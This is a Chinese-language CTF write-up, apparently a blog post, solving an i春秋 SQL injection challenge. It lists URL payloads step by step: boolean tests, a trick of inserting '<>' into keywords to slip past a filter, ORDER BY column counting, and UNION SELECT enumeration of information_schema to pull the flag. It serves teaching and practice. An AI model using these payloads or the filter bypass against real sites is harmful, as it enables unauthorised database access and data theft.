i春秋CTF训练 Web SQL

Web SQL

题目内容:出题人就告诉你这是个注入,有种别走!

链接需到ichunqiu网站申请


xxx.changame.ichunqiu.com/index.php?id=1

在这里插入图片描述

xxx.changame.ichunqiu.com/index.php?id=1=1
xxx.changame.ichunqiu.com/index.php?id=1=2

1=1时正常访问,1=2时页面为空白,为数字型注入

xxx.changame.ichunqiu.com/index.php?id=1 order by 1

在这里插入图片描述
可能是关键字过滤,经尝试,利用服务器对XSS的防护,删除<>的特性注入

xxx.changame.ichunqiu.com/index.php?id=1 ord<>er by 1

如果用or<>der 会构造or,这个字符串也被过滤了

3正常访问,4访问失败,则长度为3

xxx.changame.ichunqiu.com/index.php?id=1 ord<>er by 3
xxx.changame.ichunqiu.com/index.php?id=1 ord<>er by 4

找到回显位置

xxx.changame.ichunqiu.com/index.php?id=1 union se<>lect 1,2,3

在这里插入图片描述
显示当前数据库名

xxx.changame.ichunqiu.com/id=1 union se<>lect 1,database(),3

在这里插入图片描述

显示所有表名

xxx.changame.ichunqiu.com/index.php?id=1 union se<>lect 1,table_name,3 from information_schema.tables

显示当前调用的表

xxx.changame.ichunqiu.com/index.php?id=1 union se<>lect 1,table_name,3 from information_schema.tables where table_schema=database()
或者也可以
xxx.changame.ichunqiu.com/id=1 union se<>lect 1,table_name,3 from information_schema.tables where table_schema='sqli'

在这里插入图片描述

显示info表中的列名

xxx.changame.ichunqiu.com/id=1 union se<>lect 1,column_name,3 from information_schema.columns where table_name='info'

在这里插入图片描述

得到key

xxx.changame.ichunqiu.com/id=1 union se<>lect 1,flAg_T5ZNdrm,3 from info

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值